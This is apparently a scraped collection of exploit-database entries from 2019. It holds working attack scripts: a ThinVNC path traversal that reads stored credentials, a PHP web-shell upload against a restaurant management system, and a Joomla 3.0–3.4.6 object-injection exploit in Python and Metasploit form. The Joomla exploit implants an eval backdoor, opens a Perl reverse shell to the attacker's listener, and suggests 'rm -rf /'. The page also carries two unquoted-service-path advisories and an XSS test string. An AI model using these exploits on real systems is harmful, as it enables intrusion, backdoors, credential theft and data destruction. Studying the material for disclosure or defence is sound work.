k=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script

# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass # Date: 2019-10-17 # Exploit Author: Nikhith Tumamlapalli # Contributor WarMarX # Vendor Homepage: https://sourceforge.net/projects/thinvnc/ # Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download # Version: 1.0b1 # Tested on: Windows All Platforms # CVE : CVE-2019-17662 # Description: # Authentication Bypass via Arbitrary File Read #!/usr/bin/python3 import sys import os import requests def exploit(host,port): url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini" r = requests.get(url) body = r.text print(body.splitlines()[2]) print(body.splitlines()[3]) def main(): if(len(sys.argv)!=3): print("Usage:\n{} <host> <port>\n".format(sys.argv[0])) print("Example:\n{} 192.168.0.10 5888") else: port = sys.argv[2] host = sys.argv[1] exploit(host,port) if __name__ == '__main__': main()

# Exploit Title: Restaurant Management System 1.0 - Remote Code Execution # Date: 2019-10-16 # Exploit Author: Ibad Shah # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html # Version: N/A # Tested on: Apache 2.4.41 #!/usr/bin/python import requests import sys print (""" _ _ _____ __ __ _____ ______ _ _ _ _| || |_| __ \| \/ |/ ____| | ____| | | (_) | |_ __ _| |__) | \ / | (___ | |__ __ ___ __ | | ___ _| |_ _| || |_| _ /| |\/| |\___ \ | __| \ \/ / '_ \| |/ _ \| | __| |_ __ _| | \ \| | | |____) | | |____ > <| |_) | | (_) | | |_ |_||_| |_| \_\_| |_|_____/ |______/_/\_\ .__/|_|\___/|_|\__| | | |_| """) print ("Credits : All InfoSec (Raja Ji's) Group") url = sys.argv[1] if len(sys.argv[1]) < 8: print("[+] Usage : python rms-rce.py http://localhost:80/") exit() print ("[+] Restaurant Management System Exploit, Uploading Shell") target = url+"admin/foods-exec.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Length": "327", "Content-Type": "multipart/form-data; boundary=---------------------------191691572411478", "Connection": "close", "Referer": "http://localhost:8081/rms/admin/foods.php", "Cookie": "PHPSESSID=4dmIn4q1pvs4b79", "Upgrade-Insecure-Requests": "1" } data = """ -----------------------------191691572411478 Content-Disposition: form-data; name="photo"; filename="reverse-shell.php" Content-Type: text/html <?php echo shell_exec($_GET["cmd"]); ?> -----------------------------191691572411478 Content-Disposition: form-data; name="Submit" Add -----------------------------191691572411478-- """ r = requests.post(target,verify=False, headers=headers,data=data, proxies={"http":"http://127.0.0.1:8080"}) print("[+] Shell Uploaded. Please check the URL : "+url+"images/reverse-shell.php")

# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path # Exploit Author: Debashis Pal # Date: 2019-10-17 # Vendor : Blackmoonftpserver # Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server # Version: BlackMoon FTP Server 3.1.2.1731 # CVE : N/A # Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit) 1. Description: Unquoted service paths in BlackMoon FTP Server versions 3.1.2.1731 'BMFTP-RELEASE' have an unquoted service path. 2. PoC: C:\>sc qc BMFTP-RELEASE sc qc BMFTP-RELEASE [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BMFTP-RELEASE TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BlackMoon FTP Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem 3. Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: Softalk # Version : 7.5.1 # Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3 # Tested on Windows 10 # CVE : N/A c:\>sc qc WorkgroupMail [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WorkgroupMail TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WorkgroupMail DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path # Exploit Author: Debashis Pal # Date: 2019-10-17 # Vendor Homepage : https://webcompanion.com # Source: https://webcompanion.com # Version: Web Companion versions 5.1.1035.1047 # CVE : N/A # Tested on: Windows 7 SP1(64bit) 1. Description: Web Companion versions 5.1.1035.1047 service 'WCAssistantService' have an unquoted service path. 2. PoC: C:\>sc qc WCAssistantService sc qc WCAssistantService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WC Assistant DEPENDENCIES : SERVICE_START_NAME : LocalSystem 3. Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: Joomla! 3.4.6 - Remote Code Execution # Google Dork: N/A # Date: 2019-10-02 # Exploit Author: Alessandro Groppo # Vendor Homepage: https//www.joomla.it/ # Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 # Version: 3.0.0 --> 3.4.6 # Tested on: Linux # CVE : N/A # Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41 # Github: https://github.com/kiks7/rusty_joomla_rce # # The exploitation is implanting a backdoor in /configuration.php file in the root directory with an eval in order to be more suitable for all environments, but it is also more intrusive. # If you don't like this way, you can replace the get_backdoor_pay() with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /') #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup import sys import string import random import argparse from termcolor import colored PROXS = {'http':'127.0.0.1:8080'} PROXS = {} def random_string(stringLength): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) backdoor_param = random_string(50) def print_info(str): print(colored("[*] " + str,"cyan")) def print_ok(str): print(colored("[+] "+ str,"green")) def print_error(str): print(colored("[-] "+ str,"red")) def print_warning(str): print(colored("[!!] " + str,"yellow")) def get_token(url, cook): token = '' resp = requests.get(url, cookies=cook, proxies = PROXS) html = BeautifulSoup(resp.text,'html.parser') # csrf token is the last input for v in html.find_all('input'): csrf = v csrf = csrf.get('name') return csrf def get_error(url, cook): resp = requests.get(url, cookies = cook, proxies = PROXS) if 'Failed to decode session object' in resp.text: #print(resp.text) return False #print(resp.text) return True def get_cook(url): resp = requests.get(url, proxies=PROXS) #print(resp.cookies) return resp.cookies def gen_pay(function, command): # Generate the payload for call_user_func('FUNCTION','COMMAND') template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' #payload = command + ' || $a=\'http://wtf\';' payload = 'http://l4m3rz.l337/;' + command # Following payload will append an eval() at the enabled of the configuration file #payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def make_req(url , object_payload): # just make a req with object print_info('Getting Session Cookie ..') cook = get_cook(url) print_info('Getting CSRF Token ..') csrf = get_token( url, cook) user_payload = '\\0\\0\\0' * 9 padding = 'AAA' # It will land at this padding working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}' clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects inj_object = '";' inj_object += object_payload inj_object += 's:6:"return";s:102:' # end the object with the 'return' part password_payload = padding + inj_object params = { 'username': user_payload, 'password': password_payload, 'option':'com_users', 'task':'user.login', csrf :'1' } print_info('Sending request ..') resp = requests.post(url, proxies = PROXS, cookies = cook,data=params) return resp.text def get_backdoor_pay(): # This payload will backdoor the the configuration .PHP with an eval on POST request function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # payload = command + ' || $a=\'http://wtf\';' # Following payload will append an eval() at the enabled of the configuration file payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def check(url): check_string = random_string(20) target_url = url + 'index.php/component/users' html = make_req(url, gen_pay('print_r',check_string)) if check_string in html: return True else: return False def ping_backdoor(url,param_name): res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS) if 'PWNED' in res.text: return True return False def execute_backdoor(url, payload_code): # Execute PHP code from the backdoor res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS) print(res.text) def exploit(url, lhost, lport): # Exploit the target # Default exploitation will append en eval function at the end of the configuration.pphp # as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters') # e.g. get_payload('system','rm -rf /') # First check that the backdoor has not been already implanted target_url = url + 'index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param) print_info('Now it\'s time to reverse, trying with a system + perl') execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target',required=True,help='Joomla Target') parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only') parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit') parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP') parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port') args = vars(parser.parse_args()) url = args['target'] if(check(url)): print_ok('Vulnerable') if args['exploit']: exploit(url, args['lhost'], args['lport']) else: print_info('Use --exploit to exploit it') else: print_error('Seems NOT Vulnerable ;/') metasploit_rusty_joomla_rce.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla def initialize(info = {}) super(update_info(info, 'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution', 'Description' => %q{ PHP Object Injection because of a downsize in the read/write process with the database leads to RCE. The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter. That's because the exploit is more reliabale (doesn't rely on common disabled function). For this reason, use it with caution and remember the house cleaning. Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy }, 'Author' => [ 'Alessandro \'kiks\' Groppo @Hacktive Security', ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'] ], 'Privileged' => false, 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]], 'DisclosureDate' => 'Oct 02 2019', 'DefaultTarget' => 0) ) register_advanced_options( [ OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), ]) end def get_random_string(length=50) source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a key="" length.times{ key += source[rand(source.size)].to_s } return key end def get_session_token # Get session token from cookies vprint_status('Getting Session Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) cook = res.headers['Set-Cookie'].split(';')[0] vprint_status('Session cookie: ' + cook) return cook end def get_csrf_token(sess_cookie) vprint_status('Getting CSRF Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'headers' => { 'Cookie' => sess_cookie, } }) html = res.get_html_document input_field = html.at('//form').xpath('//input')[-1] token = input_field.to_s.split(' ')[2] token = token.gsub('name="','').gsub('"','') if token then vprint_status('CSRF Token: ' + token) return token end print_error('Cannot get the CSRF Token ..') end def get_payload(function, payload) # @function: The PHP Function # @payload: The payload for the call template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values payload = 'http://l4m3rz.l337/;' + payload final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s) return final end def get_payload_backdoor(param_name) # return the backdoor payload # or better, the payload that will inject and eval function in configuration.php (in the root) # As said in other part of the code. we cannot create new .php file because we cannot use # the ? character because of the check on URI schema function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # This payload will append an eval() at the end of the configuration file payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';" template['PAYLOAD'] = payload template['LENGTH'] = payload.length.to_s template['FUNC_NAME'] = function template['FUNC_LEN'] = function.length.to_s return template end def check_by_exploiting # Check that is vulnerable by exploiting it and try to inject a printr('something') # Get the Session anb CidSRF Tokens sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) print_status('Testing with a POC object payload') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload('print_r','IAMSODAMNVULNERABLE') # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token, }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1', } }) # Redirect in order to retrieve the output if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then return true else return false end end end def check # Check if the target is UP and get the current version running by info leak res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')}) unless res print_error("Connection timed out") return Exploit::CheckCode::Unknown end # Parse XML to get the version if res.code == 200 then xml = res.get_xml_document version = xml.at('version').text print_status('Identified version ' + version) if version <= '3.4.6' and version >= '3.0.0' then if check_by_exploiting() return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then # Try the POC 2 times. return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end else return Exploit::CheckCode::Safe end else print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable') if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end end end def exploit if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target is not vulnerable') return end pwned = false cmd_param_name = get_random_string(50) sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) # In order to avoid problems with disabled functions # We are gonna append an eval() function at the end of the configuration.php file # This will not cause any problem to Joomla and is a good way to execute then PHP directly # cuz assert is toot annoying and with conditions that we have we cannot inject some characters # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server. # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file # Use the implanted backdoor to receive a nice little reverse shell with a PHP payload # Implant the backdoor vprint_status('Cooking the exploit ..') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload_backdoor(cmd_param_name) # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object print_status('Sending exploit ..') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1' } }) print_status('Triggering the exploit ..') if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) end # Ping the backdoor see if everything is ok :/ res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => 'echo \'PWNED\';' } }) if res.to_s.include? 'PWNED' then print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST') pwned = true end if pwned then print_status('Now it\'s time to reverse shell') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => payload.encoded } }) end end end